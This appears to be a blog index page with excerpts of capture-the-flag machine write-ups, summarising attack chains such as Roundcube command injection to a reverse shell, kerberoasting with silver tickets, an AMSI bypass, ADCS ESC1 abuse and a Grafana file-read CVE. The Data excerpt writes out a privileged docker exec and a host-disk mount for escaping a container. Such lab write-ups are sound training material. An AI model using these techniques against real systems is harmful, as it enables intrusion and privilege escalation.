vl

Hybrid is a Chain mixed with a linux and windows machine. Starts off with Roundcube Webmail on http, using alias identities your able to force command injection leading to a reverse shell. The once on the box your find /etc/exports enabling rw for /opt/share, allowing for privilege escalation to user peter. Once done, you tunnel through to find a vulnerable ESC1 template allowing for Domain Computers to supply enrollees allowing for privilege escalation to Administrator. Initial NmapTwo IPs to scan. 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178Nmap scan report for 10.10.160.197Host is up (0.16s latency).Not...

Manage is a Linux Easy machine starting off with Java RMI using beanshooter. After enumeration we see we gather credentials and that authorization on the Remote MBean server isn’t required. Using this we are able to get a foothold on the machine. As user tomcat, we see other users we can attack in /etc/passwd. Trying to escalate our privilege to useradmin we have password reuse from the credentials we gathered, but upon entering the password were asked for verification. Looking in useradmin‘s home we see a backup tar file. Getting it to our machine yields this users home directory backed up. We have a ssh key we can use to get on the box, along with .google_authenticator having PINS to try. Doing so gets us sshed on the box. Looking at our users privilege, we see we have ALL:ALL on /usr/sbin/adduser. Looking at a typical sudoers file we see we can use admin as a user, as this group is not present on the box. Upon adding this user, they will in turn be added to the admin group...

Retro2 is a Easy Windows machine, that starts off with Guest auth enabled to look at shares finding a Microsoft Access Database file. After finding the user and password we are able to obtain a bloodhound dump. This shows a relatively simple path with some twists, we are able to find a couple of Pre-Windows machine and change the password for one. Allowing us to change/reset the password for the computer ADMWS01$ which has a particular attribute that allows the reset of the password. Once we’ve done this we are able to add our user to the Services group allowing for RDP access. Upon getting a session we find that with the version of Windows Server 2008 we are able to control the full path to a windows registry value that allows us to escalate to NT AUTHORITY\SYSTEM. Initial Nmap123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354PORT STATE SERVICE VERSION53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75)...

Breach is a Windows Medium box that starts with Guest auth to shares. Having read/write to one share, we upload a lnk file and receive a user hash. This hash is used to kerberoast SPNs which gets a hash for svc_mssql user. As we have a Service Account, we can create a silver ticket. After creation, we connect as Administrator to a MSSQL instance and can run commands via xp_cmdshell. Only after bypassing AMSI do you get a reverse shell. Once on the machine, checking our privileges we have SeImpersonate available to us. Using GodPotato we create a user and add them to the Administrators group, and connect as Admin via evil-winrm. Initial Nmap12345678910111213141516PORT STATE SERVICE REASON VERSION53/tcp open domain syn-ack ttl 127 Simple DNS Plus80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.088/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-28 00:08:14Z)135/tcp open msrpc ...

Data starts out with Grafana being ran on port 3000. We are able to use Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798) and exfil grafana.ini and grafana.db. Having these we can use a python script to convert this data and hashes to sha256 for hashcat. This gets us on the box as boris. Looking at his privileges we can execute docker exec. To get root privileges on the docker container we can run sudo /snap/bin/docker exec --privileged -u 0 -it grafana /bin/bash. From here we can see the filesystem df -h and since we’re root we can mkdir /tmp/pwnd and mount /dev/xXxXx /mnt/pwnd. This lets us read, write, and execute on host filesystem outside the container. Initial Nmap123PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)3000/tcp open ppp? syn-ack ttl 62 HTTP (Port 3000 - Grafana)Going to this shows a login page...

Slonik is a linux box created around reusing a socket and the ability to port forward them. It starts with a box running NFS, and using showmount our able to see two. There is /var/backups, and /home. Home was interesting, with there being a .bash_history and a .psql_history to see that we have commands previously ran. Using rpcinfo you can see we have sockets being used. From the information we have we can create a directory /tmp/sock and us it and the ending pid in the .bash_history. Using ssh we can connect using the socket created by postgres. Once connected we can get a reverse shell using a POC from hacktricks. Once getting a shell, we run pspy64 to see a script running from cron /usr/bin/backup. This script will back up everything postgres HOME directory. By copying /usr/bin/bash to our HOME directory in main. Then giving it the sticky bit and making it executable we can get root. Initial Nmap1234PORT STATE SERVICE REASON22/tcp open ssh syn-ack ttl 63111/tcp ...

Retro is a Easy Windows box working around pre-created windows 2000 machines. Pre-creating a computer means adding a computer to AD without using it to join a host to the domain right away, it just gets used later. There is a “Pre-Windows 2000” compatibility option that can be selected when creating a computer from ADUC, still present in Windows Server 2022. A computer created with this option will have a password equal to the computers name in lowercase without the ‘$’. This allows you to look at ADCS templates being used that are vulnerable, which leads to privilege escalation to Administrator. Resource from Medium Initial Nmap123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293# Nmap 7.94SVN scan initiated Wed Nov 6 22:09:30 2024 as: /usr/lib/nmap/nmap -v -sVC -oN Evidence/Scans/initial.log 10.10.111.122Nmap scan report for 10.10.111.122Host is up (0.17s...